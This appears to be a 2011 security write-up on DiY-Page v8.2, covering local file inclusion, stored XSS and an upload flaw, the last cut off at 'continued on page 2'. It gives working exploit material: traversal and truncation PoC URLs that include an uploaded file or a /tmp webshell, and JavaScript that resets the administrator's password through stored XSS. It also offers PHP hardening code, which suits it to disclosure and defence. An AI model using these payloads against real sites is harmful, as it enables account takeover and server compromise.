DiY-Page: brief vulnerability analysis
  Published: 03/18/2011
 

Earlier someone posted a brief analysis of the DiY-Page SQL injection vulnerability. I followed up by reading the code and found that DiY-Page v8.2 still has quite a few vulnerabilities, including local file inclusion, an upload vulnerability, cross-site scripting and so on.

 

A. Local file inclusion vulnerability

 

 

// js.php

$incfile = PATH_PRE . 'mod/' . $_GET['mod'] . '/js/' . $_GET['name'] . '.php';

if (!include $incfile) dperror($l_error['cant_include'], $incfile, true);

 

The vulnerability is obvious: both mod and name come straight from $_GET into an include path. With magic_quotes_gpc off it could be exploited by including an uploaded attachment, using a null byte to cut off the trailing '.php'; but the program calls addslashes() when GPC is off, which escapes the null byte.

We can still get around that with long-filename truncation (padding the path until PHP cuts it off before the '.php' suffix), or by uploading a webshell into the /tmp directory and including it from there.

 

 

PoC:

http://127.0.0.1/diypage/js.php?mod=dpuser&name=../../../up/201102/20110213_dd7ec931179c4dcb6a8ffb8b8786d20b_17872a.txt.file/////////////////

http://127.0.0.1/diypage/js.php?mod=dpuser&name=../../../../tmp/shells
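As an added example (not DiY-Page's own code), this is how the js.php include above can be hardened against all three tricks in the PoC: traversal, null bytes and path-length padding. It assumes PATH_PRE, dperror() and $l_error exist as in the original js.php; the helper names is_safe_name() and resolve_js_include() are mine.

```php
<?php
// Hardened replacement for the include logic in js.php (added example).
// Assumes PATH_PRE, dperror() and $l_error from the original file.

// A module or script name is only ever letters, digits and underscore.
// This single check already rejects "../", "%00" and "/////" padding.
function is_safe_name($value)
{
    return is_string($value) && preg_match('/^[A-Za-z0-9_]{1,32}$/', $value) === 1;
}

// Build the include path and confirm it still resolves under PATH_PRE/mod/.
// Returns the resolved path, or false if anything is off.
function resolve_js_include($mod, $name)
{
    if (!is_safe_name($mod) || !is_safe_name($name)) {
        return false;
    }

    $base    = realpath(PATH_PRE . 'mod');
    $incfile = realpath(PATH_PRE . 'mod/' . $mod . '/js/' . $name . '.php');

    // realpath() returns false for a missing file and collapses symlinks,
    // so the prefix comparison below is done on the real on-disk location.
    if ($base === false || $incfile === false) {
        return false;
    }
    if (strpos($incfile, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $incfile;
}

$incfile = resolve_js_include(
    isset($_GET['mod'])  ? $_GET['mod']  : '',
    isset($_GET['name']) ? $_GET['name'] : ''
);

if ($incfile === false || !include $incfile) {
    dperror($l_error['cant_include'], (string) $incfile, true);
}
```

The allow-list regex is the actual fix; the realpath() containment check is a second line of defence so that a later change to how $incfile is built cannot quietly reintroduce traversal.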

 

 

 

B. XSS (cross-site scripting) vulnerability

There is a lot of cross-site scripting: the input is not filtered at all. Typical code:

 

 

if ($_POST['issubmit'] == true) {

    $fidarray = trim($_POST['fidarray']);

    $backurl = 'javascript:history.go(-1);';

    $actionurlold = $actionurl;

    $actionurl .= '&do=list&cataid=' . $_GET['cataid'];

    $entrytitle = $_POST['entrytitle'];

    $entrycontent = $_POST['entrycontent'];

    $entrytag = trim($_POST['entrytag']);

    ...

 

The entry title submitted when publishing an entry is stored and printed without any escaping, so JavaScript placed in it runs, and because the same title is rendered in the backend the XSS reaches the administrator as well.

Once we have XSS there is a lot we can do: hijack users, steal cookies, escalate privileges, write shells. Below is JavaScript that resets the administrator's password:

 

 

var xmlhttp = false;

if (window.XMLHttpRequest) {

    xmlhttp = new XMLHttpRequest();

} else if (window.ActiveXObject) {

    xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");

    if (!xmlhttp) { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }

}

var action = "/diypage/admin.php?mod=dpuser&item=modcp&formod=useradm&do=edit&uid=1&brief=1&perpage=20";

var data = "gid=2&oldgid=2&dpusername=admin&dpusernewpassword=cnryan&usertpl=&regip=&loginip=&dpuseremail=&dpusermoney=0&dpuserintro=&avatar=default.gif&nickname=&issubmit=true";

xmlhttp.open("POST", action, false);

xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

xmlhttp.send(data);
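As an added example (not DiY-Page's own code), the two changes that break the chain above: escape the entry fields at output time so the title cannot carry script, and require the current password before the admin user-edit handler accepts dpusernewpassword, so script already running in the admin's browser cannot reset it with one POST. dperror() and the issubmit/dpusernewpassword field names are from the page; render_entry_title(), new_password_accepted(), load_admin_password_hash() and the current_password field are hypothetical names introduced here.

```php
<?php
// Added hardening example for the entry-publishing and admin user-edit
// handlers. Assumes dperror() exists as on the page and that the admin's
// password hash was created with password_hash().

// Escape once, at output time. The raw title is stored; it is never echoed as-is.
function h($s)
{
    return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
}

// Hypothetical renderer used by both the front page and the backend list,
// so the stored XSS shown above never executes in either place.
function render_entry_title($entrytitle)
{
    return '<h2>' . h($entrytitle) . '</h2>';
}

// Password changes need the one secret injected script does not have:
// the current password. A CSRF token alone would not help here, because
// script running in the admin's origin can simply read the token from the form.
function new_password_accepted($stored_hash, $current_password, $new_password)
{
    if (!is_string($current_password) || !is_string($new_password)) {
        return false;
    }
    if (!password_verify($current_password, $stored_hash)) {
        return false;
    }
    return strlen($new_password) >= 8;
}

// Entry publishing (compare with the unfiltered block on the page).
if (!empty($_POST['issubmit'])) {
    $entrytitle   = isset($_POST['entrytitle'])   ? $_POST['entrytitle']   : '';
    $entrycontent = isset($_POST['entrycontent']) ? $_POST['entrycontent'] : '';
    // ... save $entrytitle and $entrycontent ...
    echo render_entry_title($entrytitle);   // "<script>" is emitted as &lt;script&gt;
}

// Admin user edit (the handler the payload above posts to).
if (!empty($_POST['issubmit']) && isset($_POST['dpusernewpassword'])) {
    $stored_hash = load_admin_password_hash((int) $_GET['uid']);   // hypothetical loader
    $current     = isset($_POST['current_password']) ? $_POST['current_password'] : '';
    if (!new_password_accepted($stored_hash, $current, $_POST['dpusernewpassword'])) {
        dperror('password change refused', '', true);
    }
    // ... continue with the edit ...
}
```

Output escaping is the fix for the XSS itself; the re-authentication step limits the damage if another injection point is found later, which is the realistic case for an application where "input is not filtered at all".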

C. Upload vulnerability

The DiY-Page function that handles uploaded attachment filenames, get_upload_filename (located with RIPS), is as follows:

// inc/func.php

function get_upload_filename($realname) {

 

 

(Continued on page 2.)